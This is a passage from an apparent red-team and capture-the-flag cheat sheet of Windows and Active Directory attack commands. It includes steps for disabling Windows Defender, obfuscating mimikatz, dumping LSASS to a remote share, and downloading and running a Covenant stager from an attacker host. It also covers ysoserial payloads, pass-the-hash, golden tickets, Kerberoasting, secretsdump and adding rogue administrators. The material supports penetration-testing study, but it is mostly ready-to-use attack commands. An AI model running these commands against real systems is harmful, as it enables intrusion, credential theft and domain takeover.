1643 | $ ps | findstr "something" 1644 | 1645 | => Kill Process 1646 | $ stop-process -id 500 -force 1647 | 1648 | => Wget 1649 | $ wget 10.10.10.10/output.txt -outfile output.txt 1650 | 1651 | => Find file (recursive) 1652 | $ Get-ChildItem -Path C:\ -Filter ntds.dit -Recurse -ErrorAction SilentlyContinue -Force 1653 | 1654 | => Search content recursively 1655 | $ Get-ChildItem -Include "*.*" -recurse | Select-String -pattern "flag" | group path | select name 1656 | $ Get-ChildItem -Include "*.*" -recurse | Select-String -pattern "password" | group path | select name 1657 | 1658 | => Search Content 1659 | $ (Get-ChildItem C:\Users).Count 1660 | 1661 | => Disable Windows Defender 1662 | $ Set-MpPreference -DisableRealtimeMonitoring $true 1663 | 1664 | => Get Local/Remote Port 1665 | ((Get-NetTCPConnection -State Listen | select -ExpandProperty LocalPort) -join [char]44) 1666 | ((Get-NetTCPConnection -State Established | select -ExpandProperty RemotePort |Sort-Object -Unique) -join [char]44) 1667 | 1668 | => Get SMBShare 1669 | ((Get-SMBShare | select -ExpandProperty Name) -join [char]44) 1670 | 1671 | => Get IPV4 Address 1672 | (Get-NetIPAddress -AddressFamily IPv4).IPAddress 1673 | 1674 | => Read /etc/hosts (Remove # - Comments) 1675 | (Get-Content C:\Windows\System32\drivers\etc\hosts | Where { $_ -notmatch [char]94+[char]35 }).Trim() 1676 | 1677 | => List commandline process 1678 | wmic process list full | findstr /I commandline | Sort-Object -Unique 1679 | wmic process list full | findstr /I commandline | Sort-Object -Unique | Select-String -Pattern "password" 1680 | $test=[char]117+[char]114+[char]108;wmic process list full | findstr /I commandline |Sort-Object -Unique | Select-String -Pattern $test 1681 | 1682 | => Exclude String 1683 | type text.txt | Select-String -Pattern "food|eat" -NotMatch 1684 | 1685 | => Base64 (Encode) 1686 | $Text = 'This is a secret and should be hidden' 1687 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 1688 | 
$EncodedText =[Convert]::ToBase64String($Bytes) 1689 | $EncodedText 1690 | 1691 | => Base64 (Encode - EXE) 1692 | $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\Administrator\Documents\mimikatz.exe')); 1693 | [IO.File]::WriteAllText('C:\Users\Administrator\Documents\encode.txt', $b64) 1694 | 1695 | => Reverse 1696 | $text2 = (cat 'C:\Windows\Tasks\output.txt') 1697 | -join $text2[-1..-$text2.Length] 1698 | @ 1699 | $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Windows\Tasks\mimikatz.exe')) 1700 | $text = $b64.ToCharArray() 1701 | [Array]::Reverse($text) 1702 | -join $text 1703 | 1704 | => Append File / Combine File 1705 | $ [string]::join("",((cat C:\Windows\Tasks\output.txt, C:\Windows\Tasks\output2.txt).Split("`n"))) > C:\Windows\Tasks\output3.txt 1706 | 1707 | => List Firewall Settings 1708 | netsh firewall show state 1709 | 1710 | => View lnk files information 1711 | $sh = New-Object -COM WScript.Shell 1712 | $targetPath = $sh.CreateShortcut('C:\Users\Public\Desktop\shortcut.lnk') 1713 | $targetPath 1714 | ``` 1715 | 1716 | ### Abusing Weak GPO Permissions 1717 | 1718 | ```bash 1719 | => Find Vulnerable GPO (Using PowerView) 1720 | $ Get-DomainObjectAcl -Identity "GPOName" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} 1721 | $ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} 1722 | $ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name | ?{($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")}} 1723 | 1724 | => Abuse Using SharpGPOAbuse 1725 | $ https://github.com/FSecureLABS/SharpGPOAbuse 1726 | $ .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author bank.local\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -e " --GPOName "Vulnerable GPO" 1727 | $ .\SharpGPOAbuse.exe --AddComputerTask 
--TaskName "Debug" --Author bank.local\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators nik /add" --GPOName "Vulnerable GPO" 1728 | $ .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount nik --GPOName "Vulnerable GPO" 1729 | $ gpupdate /force 1730 | 1731 | => References 1732 | $ https://book.hacktricks.xyz/windows/active-directory-methodology/acl-persistence-abuse#abusing-weak-gpo-permissions 1733 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#exploit-group-policy-objects-gpo 1734 | ``` 1735 | 1736 | ### Active Directory Enumeration 1737 | 1738 | ```bash 1739 | => Find Group Membership 1740 | $ (Get-WmiObject -Class Win32_GroupUser | where-object {$_.PartComponent -match "SQLAadmin"} | %{[wmi]$_.GroupComponent}).Caption 1741 | 1742 | => Find Domain Controllers 1743 | $ [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain().DomainControllers.Name 1744 | 1745 | => List Domain Computer 1746 | $ Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn 1747 | $ (Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn).Count 1748 | 1749 | => References 1750 | $ https://mlcsec.com/active-directory-domain-enumeration-part-2/ 1751 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md 1752 | ``` 1753 | 1754 | ### Windows Commands 1755 | 1756 | ```bash 1757 | => Commands 1758 | $ cmdkey /list 1759 | 1760 | => taskkill 1761 | $ taskkil /F /PID 8071 1762 | 1763 | => sc 1764 | $ sc qc servicename 1765 | $ sc queryex servicename 1766 | $ sc stop serviceanme 1767 | $ sc start servicename 1768 | $ sc query servicename 1769 | 1770 | => Find File Recursive 1771 | $ dir *flag* /s /b 1772 | 1773 | => winrs 1774 | $ winrs.exe -r:WEB01APP hostname 1775 | 1776 | => Change Password User 1777 | $ net user 
Administrator Passw0rd@123! 1778 | 1779 | => Dump process or pid 1780 | $ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full 1781 | $ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] \\10.10.10.10\public\dump.bin full 1782 | 1783 | ``` 1784 | 1785 | ### Bloodhound 1786 | 1787 | ```code 1788 | => Donwloads/Install 1789 | $ sudo apt-get install bloodhound 1790 | 1791 | => Commands 1792 | $ ne04j console 1793 | $ neo4j 1794 | 1795 | => Notes 1796 | $ http://localhost:7474/ 1797 | $ neo4j:neo4j 1798 | 1799 | ``` 1800 | 1801 | ### Red Team References 1802 | 1803 | ```bash 1804 | => References 1805 | $ https://www.vincentyiu.com/red-team-tips 1806 | $ https://vysecurity.rocks/ 1807 | $ https://herrscher.info/index.php/2021/04/11/red-teaming-guide/ 1808 | $ http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html 1809 | $ https://www.exploit-db.com/docs/48282 1810 | $ https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/ 1811 | ``` 1812 | 1813 | ### Rubeus 1814 | ```bash 1815 | # Download 1816 | https://github.com/GhostPack/Rubeus 1817 | 1818 | # Commands 1819 | .\Rubeus.exe asreproast /format:hashcat /outfile:ou.txt 1820 | .\Rubeus.exe kerberoast /outfile:ou.txt 1821 | .\Rubeus.exe asktgs /ticket: /service:MSSQL\DC01.MEGACORP.LOCAL 1822 | .\Rubeus.exe hash /user:nik /domain:BANK /password:password 1823 | .\Rubeus dump 1824 | * [IO.File]::WriteAllBytes("C:\users\administrator\downloads\ticket.kirbi", [Convert]::FromBase64String("")) 1825 | * .\Rubeus.exe ptt /ticket:ticket.kirbi 1826 | * .\PsExec64.exe -accepteula \\bank.local -u nikk cmd 1827 | .\Rubeus.exe s4u /user:nk /rc4:238F7038FD4BBC3293D8E75566DF4D65 /impersonateuser:administrator /msdsspn:"MSSQL/DC01.BANK.LOCAL" /altservice:cifs,http,host,mssql,mssqlsvc,ldap,krbtgt /ptt 1828 | .\Rubeus.exe dump /nowrap 1829 | * 
[IO.File]::WriteAllBytes("C:\users\nik\downloads\cifs.kirbi", [Convert]::FromBase64String("")) 1830 | * ticketConverter.py cifs.kirbi cifs.ccache 1831 | ``` 1832 | 1833 | ### Covenant 1834 | 1835 | ```bash 1836 | # Dotnet Install/Download 1837 | https://dotnet.microsoft.com/download/dotnet/3.1 1838 | 1839 | # Commands 1840 | ImpersonateProcess 1776 1841 | ImpersonateProcess 1842 | PortScan 192.168.20.10 10-2000 1843 | 1844 | # Chisel 1845 | - shell C:\windows\tasks\chisel_windows.exe client 10.10.10.10:8000 R:1080:socks 1846 | * Edit /etc/proxychains4.conf => socks5 127.0.0.1 1080 1847 | 1848 | # Rubeus 1849 | - Rubeus kerberoast admin hashcat 1850 | - Rubeus klist 1851 | 1852 | # Import Powershell 1853 | - PowerShellImport 1854 | - Choose file 1855 | 1856 | # Powerview 1857 | - Powershell Get-DomainUser -TrustedToAuth 1858 | 1859 | # PowerMad 1860 | - Powershell Resolve-DNSName NoDNSRecord 1861 | - Powershell New-ADIDNSNode -Node * -Verbose 1862 | - Powershell grant-adidnspermission -node * -principal "Authenticated Users" -Access GenericAll -Verbose 1863 | 1864 | # Invoke-DNSUpdate 1865 | - Powershell Invoke-DNSupdate -DNSType A -DNSName * -DNSData 10.10.10.10 -Verbose 1866 | 1867 | # Inveigh 1868 | - Powershell Invoke-InveighRelay -ConsoleOutput -Y -StatusOutput N -Command "net user commandtest Passw0rd123! 
/add" -Attack Enumerate,Execute,Session 1869 | - Powershell Invoke-Inveigh -ConsoleOutput Y 1870 | - Powershell Stop-Inveigh 1871 | - Powwershell Invoke-Inveigh -FileOutput Y 1872 | 1873 | # Load Grunt (Load Assembly) 1874 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/grunt.exe') 1875 | $assem = [System.Reflection.Assembly]::Load($data) 1876 | [GruntStager.GruntStager]::Main("".Split()) 1877 | 1878 | # Impersonate 1879 | getsystem 1880 | 1881 | ``` 1882 | 1883 | ### PoshC2 1884 | 1885 | ```code 1886 | # Install 1887 | curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash 1888 | 1889 | # Commands (posh) 1890 | posh-project -n 1891 | posh-project -d 1892 | posh-config 1893 | posh-server <-- This will run the C2 server, which communicates with Implants and receives task output 1894 | posh <-- This will run the ImplantHandler, used to issue commands to the server and implants 1895 | posh-service <-- This will run the C2 server as a service instead of in the foreground 1896 | posh-stop-service <-- This will stop the service 1897 | posh-log <-- This will view the C2 log if the server is already running 1898 | posh -u aniq 1899 | 1900 | # Commands 1901 | 1902 | 1903 | # References 1904 | https://github.com/nettitude/PoshC2 1905 | https://poshc2.readthedocs.io/en/latest/ 1906 | https://github.com/zenosxx/PoshC2 1907 | ``` 1908 | 1909 | ### Adb 1910 | 1911 | ```bash 1912 | => Install 1913 | $ sudo apt-get install android-tools-adb android-tools-fastboot 1914 | 1915 | => Commands 1916 | $ adb devices 1917 | $ adb shell 1918 | $ adb -s localhost:5555 shell 1919 | ``` 1920 | 1921 | ### Pypykatz 1922 | 1923 | ```code 1924 | # Intall 1925 | pip3 install pypykatz 1926 | 1927 | # Commands 1928 | pypykatz lsa minidump lsass.dmp 1929 | pypykatz registry --sam sam system 1930 | ``` 1931 | 1932 | ### DomainPasswordSpray.ps1 1933 | 1934 | ```bash 1935 | # Command 1936 | 1937 | 1938 | # References 1939 | 
https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1 1940 | ``` 1941 | 1942 | ### Httpx 1943 | 1944 | ```bash 1945 | # Install 1946 | GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx 1947 | ``` 1948 | 1949 | ### Stabilize 1950 | 1951 | ```bash 1952 | => Ways 1953 | $ script -qc /bin/bash /dev/null 1954 | $ python -m 'import pty;pty.spawn("/bin/bash"))' 1955 | $ python3 -m 'import pty;pty.spawn("/bin/bash"))' 1956 | $ Ctrl + z @ stty -raw echo;fg 1957 | ``` 1958 | 1959 | ### Port Forwarding & Tunneling 1960 | 1961 | ```bash 1962 | # Socat 1963 | socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22 1964 | socat tcp-listen:8080,reuseaddr,fork tcp:localhost:8080 1965 | 1966 | # Meterpreter 1967 | portfwd add -l -p -r 1968 | 1969 | # Chisel 1970 | ## Client Machine 1971 | ./chisel client 10.66.67.154:8000 R:25:127.0.0.1:25 1972 | ./chisel client 10.66.67.130:8000 R:8080:127.0.0.1:8080 1973 | ./chisel client 10.10.10.10:8001 R:1080:socks 1974 | 1975 | ## Attacker Machine 1976 | ./chisel server -p 8000 --reverse 1977 | 1978 | # References 1979 | -> https://book.hacktricks.xyz/tunneling-and-port-forwarding 1980 | ``` 1981 | 1982 | ### Crackmapexec 1983 | 1984 | ```code 1985 | => Docker install 1986 | $ docker pull byt3bl33d3r/crackmapexec 1987 | $ docker run -it --entrypoint=/bin/sh --name crackmapexec byt3bl33d3r/crackmapexec 1988 | $ docker start crackmapexec 1989 | $ docker exec -it crackmapexec sh 1990 | $ docker cp /var/lib/docker/volumes/data/_data/EMPLOYEE.FDB firebird:/firebird/data/EMPLOYEE2.FDB 1991 | 1992 | => Commands 1993 | $ crackmapexec smb --gen-relay-list targets.txt 10.10.10.0/24 1994 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -X whoami --amsi-bypass /tmp/amsiibypass 1995 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' 
-x whoami 1996 | $ crackmapexec smb 10.10.10.10 -u 'nik' -H hash_uniq.txt 1997 | ``` 1998 | 1999 | ### Impacket Tools 2000 | 2001 | ```bash 2002 | => GetNPUsers.py (AsrepRoasting) 2003 | $ GetNPUsers.py -dc-ip 10.10.10.10 -request 'bank.local/' -no-pass -usersfile user.txt -format hashcat 2004 | mode 18200 2005 | 2006 | => GetUserSPNs.py (Kerberoasting) 2007 | $ GetUserSPNs.py bank.local/nik:'Password@123!' -dc-ip 10.10.10.10 -request -outputfile output.txt 2008 | 2009 | => GetADUsers.py 2010 | $ GetADUsers.py -all bank.local/nik:'Password@123!'-dc-ip 10.10.10.10 2011 | 2012 | => secretsdump.py 2013 | $ export KRB5CCNAME=Administrator.ccache 2014 | $ secretsdump.py -k DC01.bank.local -just-dc 2015 | $ secretsdump.py -just-dc bank.local/nik:'Password@123!'@10.10.10.10 2016 | $ secretsdump.py -ntds ntds.dit -system system local 2017 | $ secretsdump.py -ntds ntds.dit -system system local -history 2018 | $ secretsdump.py -sam SAM -system SYSTEM local 2019 | $ secretsdump.py -ntds ntds.dit -system system.hive local -outputfile dump.txt 2020 | $ secretsdump.py bank.local/Administrator@BANK -target-ip 10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460 2021 | 2022 | => getST.py 2023 | $ getST.py -spn MSSQL/DC01.BANK.LOCAL 'BANK.LOCAL/nik:password' -impersonate Administrator -dc-ip 10.10.10.10 2024 | $ getST.py -spn MSSQL/DC01.BANK.LOCAL 'BANK.LOCAL/nik' -impersonate Administrator -dc-ip 10.10.10.10 -hashes ':2182eed0101516d0ax06b98c579x65e6' 2025 | 2026 | => getTGT.py 2027 | $ getTGT.py -dc-ip 10.10.10.10 bank.local/nik:'Passw0rd@123!' 
2028 | 2029 | => wmiexec.py 2030 | $ export KRB5CCNAME=Administrator.ccache; 2031 | $ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0405e42853c0f2cb0454964601f27bae administrator@10.10.10.10 2032 | $ wmiexec.py -hashes :0405e42853c0f2cb0454964601f27bae administrator@10.10.10.10 2033 | $ wmiexec.py bank.local/Administrator@DC.bank.local -k -no-pass 2034 | 2035 | => psexec.py 2036 | $ export KRB5CCNAME=Administrator.ccache 2037 | $ psexec.py BANK\Administrator@10.10.10.10 -hashes 'aad3b435b51404eeaad3b435b51404ee:2182eed0101516d0ax06b98c579x65e6' 2038 | $ psexec.py bank.local/nik:'Password@123'@10.10.10.10 2039 | $ psexec.py -dc-ip 10.10.10.10 -target-ip 10.10.10.10 -no-pass -k bank.local/Administrator@DC.bank.local 2040 | $ psexec.py bank.local/Administrator@DC.bank.local -k -no-pass 2041 | 2042 | => smbclient.py 2043 | $ export KRB5CCNAME=Administrator.ccache; 2044 | $ smbclient.py bank.local/nik:'Password@123'@10.10.10.10 2045 | $ smbclient.py bank.local/administrator@dc.bank.local -dc-ip 10.10.10.10 -target-ip 10.10.10.10 -no-pass -k 2046 | $ smbclient.py bank.local/administrator@dc.bank.local -no-pass -k 2047 | $ shares 2048 | $ ls 2049 | $ cd .. 
2050 | $ cat flag.txt 2051 | 2052 | => mssqlclient.py 2053 | $ mssqlclient.py -windows-auth bank.local/aniq:'Password@123'@10.10.10.10 2054 | 2055 | => ticketConverter.py 2056 | $ ticketConverter.py cifs.kirbi cifs.ccache 2057 | 2058 | => ticketer.py (Golden Tick) 2059 | $ ticketer.py -domain bank.local -nthash -dc-ip 10.10.10.10 -domain-sid 2060 | $ ticketer.py -domain bank.local -nthash 4e48ce125611add31a32cd79e529964b -dc-ip 10.10.10.10 -domain-sid S-1-5-21-3750359090-2939318659-876128439 lolol 2061 | 2062 | => lookupsid.py 2063 | $ lookupsid.py Administrator:password@10.10.10.10 2064 | $ lookupsid.py bank.local/Administrator@10.10.11.108 -hashes ':32db622ed9c00dd1039d8288b0407460' 2065 | 2066 | => References 2067 | $ https://www.hackingarticles.in/abusing-kerberos-using-impacket/ 2068 | ``` 2069 | 2070 | ### Git-LFS 2071 | 2072 | ```code 2073 | # Download 2074 | wget https://github.com/git-lfs/git-lfs/releases/download/v2.9.0/git-lfs-linux-amd64-v2.9.0.tar.gz 2075 | 2076 | # Steps 2077 | tar -xf git-lfs-linux-amd64-v2.9.0.tar.gz 2078 | chmod +x install.sh 2079 | sudo ./install.sh 2080 | 2081 | # Inside directory repo 2082 | git lfs install 2083 | git lfs track "*.m" 2084 | git add .gitattributes 2085 | git commit -am "Done" 2086 | git push origin master 2087 | ``` 2088 | 2089 | ### Git Commands 2090 | 2091 | ```bash 2092 | => Commands 2093 | git status 2094 | git pull 2095 | git add . 
2096 | git commit -m "Update" 2097 | git push 2098 | git stash 2099 | git stash list 2100 | git stash show -p "stash@{0}" 2101 | git stash apply "stash@{0}" 2102 | ``` 2103 | 2104 | ### Objection 2105 | 2106 | ```bash 2107 | # Install 2108 | pip3 install -U objection 2109 | 2110 | # Commands 2111 | - objection patchapk --source base.apk 2112 | - objection patchapk --source base.apk -a arm64 2113 | - adb install base.objection.apk 2114 | - objection -g com.app.yes explore 2115 | - objection explore (Make sure to open the application first in our mobile phone before run) 2116 | 2117 | #==Android== 2118 | * android sslpinning disable 2119 | 2120 | #==Ios== 2121 | * ios sslpinning disable 2122 | 2123 | # References 2124 | - https://gowthamr1.medium.com/android-ssl-pinning-bypass-using-objection-and-frida-scripts-f8199571e7d8 2125 | - https://github.com/sensepost/objection/tree/master/objection/console/helpfiles 2126 | - https://rehex.ninja/posts/frida-cheatsheet/ 2127 | - https://cheatography.com/hnd/cheat-sheets/objection-ios/ 2128 | ``` 2129 | 2130 | ### Ysoserial 2131 | 2132 | ```bash 2133 | # Download 2134 | https://github.com/pwntester/ysoserial.net 2135 | 2136 | # Commands 2137 | ##==Json.Net== 2138 | .\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell curl http://10.10.10.10/" 2139 | 2140 | ``` 2141 | 2142 | ### Obsidian (Tricks) 2143 | 2144 | ```code 2145 | # GitHub (Example -> https://github.com/H0j3n/EzpzCTF) 2146 | - This is how im manage to upload files and not worry about the location (If there is any other ways let me know) 2147 | - Make one folder name as src in root path (git repo) 2148 | - Then you copy the url path to that image 2149 | - Example : https://github.com/H0j3n/EzpzCTF/tree/main/src/ 2150 | - This a one liner to do that 2151 | - Make sure to change the url to yours. 2152 | - It receive url encode thats why you will see %20 in the url which equivalent to spaces. 
2153 | 2154 | ======(One Liner)===== 2155 | cat README.md | sed 's/\!\[\[Pasted image /\!\[\]\(https\:\/\/github.com\/H0j3n\/EzpzCTF\/blob\/main\/src\/Pasted%20image%20/g' | sed 's/.png\]\]/.png\)/g' > test.md;mv test.md README.md 2156 | ====================== 2157 | ``` 2158 | 2159 | ### Python Scripter (Burp) 2160 | 2161 | ```bash 2162 | # Install 2163 | - https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52583 2164 | 2165 | # References 2166 | - https://gist.github.com/lanmaster53/3d868369d0ba5144b215921d4e11b052 2167 | - https://github.com/PortSwigger/python-scripter 2168 | ``` 2169 | 2170 | ### Burpsuite 2171 | 2172 | ```bash 2173 | => Extensions List 2174 | $ https://github.com/snoopysecurity/awesome-burp-extensions#xxe 2175 | $ https://portswigger.net/solutions/penetration-testing/penetration-testing-tools 2176 | ``` 2177 | 2178 | ### CTI Lexicon 2179 | 2180 | ``` 2181 | Link : https://github.com/BushidoUK/CTI-Lexicon/blob/main/Lexicon.md 2182 | 2183 | # About 2184 | - Guide to some of the jargon and acronyms liberally used in CTI. 
You will sometimes find these peppered in reports with no explanation offered or in the Tweets by professionals from Infosec Twitter 2185 | ``` 2186 | 2187 | ### Waifu2x (Image Super-Resolution) 2188 | 2189 | ``` 2190 | # References 2191 | - https://github.com/nagadomi/waifu2x 2192 | - http://waifu2x.udp.jp/ 2193 | ``` 2194 | 2195 | ### Responder 2196 | 2197 | ```bash 2198 | => Download 2199 | $ https://github.com/SpiderLabs/Responder 2200 | 2201 | => Configuration Location 2202 | $ /etc/responder/Responder.conf 2203 | 2204 | => Commands 2205 | $ sudo responder -I tun0 -rdwv 2206 | ``` 2207 | 2208 | ### gMSADumper.py 2209 | 2210 | ```bash 2211 | => Download 2212 | $ https://github.com/micahvandeusen/gMSADumper 2213 | 2214 | => Commands 2215 | $ python3 gMSADumper.py -u 'nik' -p 'Passw0rd@123!'' -d bank.local 2216 | 2217 | => References 2218 | $ https://docs.microsoft.com/en-us/windows/win32/adschema/a-msds-managedpasswordid 2219 | $ https://github.com/n00py/LAPSDumper/ 2220 | $ https://github.com/micahvandeusen/gMSADumper 2221 | ``` 2222 | 2223 | ### Krbrelayx - Unconstrained delegation abuse toolkit 2224 | 2225 | ```bash 2226 | => Download 2227 | $ https://github.com/dirkjanm/krbrelayx 2228 | 2229 | => printerbug.py 2230 | $ Simple tool to trigger SpoolService bug via RPC backconnect 2231 | $ 2232 | 2233 | => addspn.py 2234 | $ Add an SPN to a user/computer account 2235 | $ 2236 | 2237 | => dnstool.py 2238 | $ Query/modify DNS records for Active Directory integrated DNS via LDAP 2239 | $ .\dnstool.py -u BANK\\nik -p 'Passw0rd@123!' -r web01.bank.local -d 10.10.10.12 --action add 19.10.10.10 2240 | 2241 | => krbrelayx.py 2242 | $ Kerberos "relay" tool. Abuses accounts with unconstrained delegation to pwn 2243 | things. 
2244 | 2245 | => References 2246 | https://github.com/dirkjanm/krbrelayx 2247 | ``` 2248 | 2249 | ### Vboxmanage.exe 2250 | 2251 | ```bash 2252 | # Commands 2253 | .\VboxMange.exe -nologo guestcontrol "Docker" run -exe "/bin/bash" --username "nik" --password "password123" --wait-stdout -- bash -c '/usr/bin/echo "oassword123" | sudo -S cat /etc/passwd 2>/dev/null' 2254 | ``` 2255 | 2256 | ### Powerview.ps1 2257 | 2258 | ```code 2259 | => Download 2260 | $ git clone https://github.com/PowerShellMafia/PowerSploit.git 2261 | 2262 | => Commands 2263 | $ Get-DomainComputer 2264 | $ Get-DomainComputer -properties name 2265 | $ Get-DomainComputer -Unconstrained -Properties useraccountcontrol,dnshostname | fl 2266 | $ Get-DomainTrustMapping -Verbose 2267 | $ Get-DomainTrust 2268 | $ Get-NetForest 2269 | $ Get-NetForestDomain 2270 | $ Get-NetForestTrust 2271 | $ (get-domaincomputer -domain bank.local).dnshostname 2272 | $ Get-NetLoggedon 2273 | $ Get-NetProcess 2274 | $ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} 2275 | $ Get-DomainObjectAcl -Identity "GPOName" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} 2276 | $ Invoke-ShareFinder 2277 | $ Invoke-UserHunter 2278 | 2279 | => References 2280 | $ https://gist.github.com/macostag/44591910288d9cc8a1ed6ea35ac4f30f 2281 | $ https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 2282 | $ https://www.slideshare.net/harmj0y/i-have-the-powerview 2283 | ``` 2284 | 2285 | ### Generate client SSL Certificate 2286 | 2287 | ```bash 2288 | # Download server side certificate (Browser) 2289 | - Click on the Lock icon in the url row > Show Connection Details > More Information > View Certificate > Download PEM (cert) > Save it as .crt 2290 | 2291 | # Check 2292 | openssl pkey -in ca.key -pubout | md5sum 2293 | openssl x509 -in lacasadepapel-htb.crt -pubkey -noout | md5sum 2294 | 2295 | - This will 
give the same md5sum output which is => 71e2b2ca7b610c24d132e3e4c06daf0c 2296 | 2297 | # Generate private key for SSL client 2298 | openssl genrsa -out client.key 4096 2299 | 2300 | # Generate cert request 2301 | openssl req -new -key client.key -out client.req 2302 | 2303 | # Issue client certificate 2304 | openssl x509 -req -in client.req -CA lacasadepapel-htb.crt -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer 2305 | 2306 | # Convert to pkcs#12 format (Browser) 2307 | openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12 2308 | 2309 | # Clean (optional) 2310 | rm client.key client.cer client.req 2311 | 2312 | # References 2313 | https://www.makethenmakeinstall.com/2014/05/ssl-client-authentication-step-by-step/ 2314 | ``` 2315 | 2316 | ### Active Directory 2317 | 2318 | ```bash 2319 | # Commands 2320 | net user /domain 2321 | net group /domain 2322 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 2323 | 2324 | # LDAP 2325 | ======script(domain)====== 2326 | $domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 2327 | $Pdc = ($domainObject.PdcRoleOwner).Name 2328 | $searchString = "LDAP://" 2329 | $searchString += $Pdc + "/" 2330 | $Name = "DC=$($domainObject.Name.Replace('.', ',DC='))" 2331 | $searchString += $Name 2332 | $search = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchString) 2333 | $objectDomain = New-Object System.DirectoryServices.DirectoryEntry 2334 | $search.SearchRoot = $objectDomain 2335 | $search.filter="samAccountType=805306368" 2336 | $res = $search.FindAll() | Sort-Object path 2337 | ================== 2338 | 2339 | ======script(Local)===== 2340 | $Searcher = New-Object DirectoryServices.DirectorySearcher 2341 | $Searcher.SearchRoot = 'LDAP://CN=Users,DC=bank,DC=local' 2342 | $Searcher.Filter = '(&(objectCategory=person))' 2343 | $res = $Searcher.FindAll() | Sort-Object path 2344 | =================== 2345 | 
2346 | # LDAP References 2347 | https://gist.github.com/Erreinion/76660c012ad05ab90182 2348 | 2349 | # .Net Method 2350 | =====ADForestInfo==== 2351 | $ADForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() 2352 | $ADForestInfo.Name 2353 | $ADForestInfo.Sites 2354 | $ADForestInfo.Domains 2355 | $ADForestInfo.GlobalCatalogs 2356 | $ADForestInfo.ApplicationPartitions 2357 | $ADForestInfo.ForestMode 2358 | $ADForestInfo.RootDomain 2359 | $ADForestInfo.Schema 2360 | $ADForestInfo.SchemaRoleOwner 2361 | $ADForestInfo.NamingRoleOwner 2362 | OR 2363 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Name 2364 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites 2365 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Domains 2366 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().GlobalCatalogs 2367 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().ApplicationPartitions 2368 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().ForestMode 2369 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().RootDomain 2370 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Schema 2371 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().SchemaRoleOwner 2372 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().NamingRoleOwner 2373 | ===================== 2374 | 2375 | 2376 | # .Net Method References 2377 | https://adsecurity.org/?p=113 2378 | ``` 2379 | 2380 | ### Waybackurls 2381 | 2382 | ```bash 2383 | # Install 2384 | go get github.com/tomnomnom/waybackurls 2385 | 2386 | # Commands 2387 | cat comain.txt| waybackurls > wayback.txt 2388 | ``` 2389 | 2390 | ### Gau 2391 | 2392 | ```bash 2393 | # Download 2394 | GO111MODULE=on go get -u -v github.com/lc/gau 2395 | 2396 | # References 2397 | https://github.com/lc/gau 2398 | ``` 2399 | 2400 | ### 
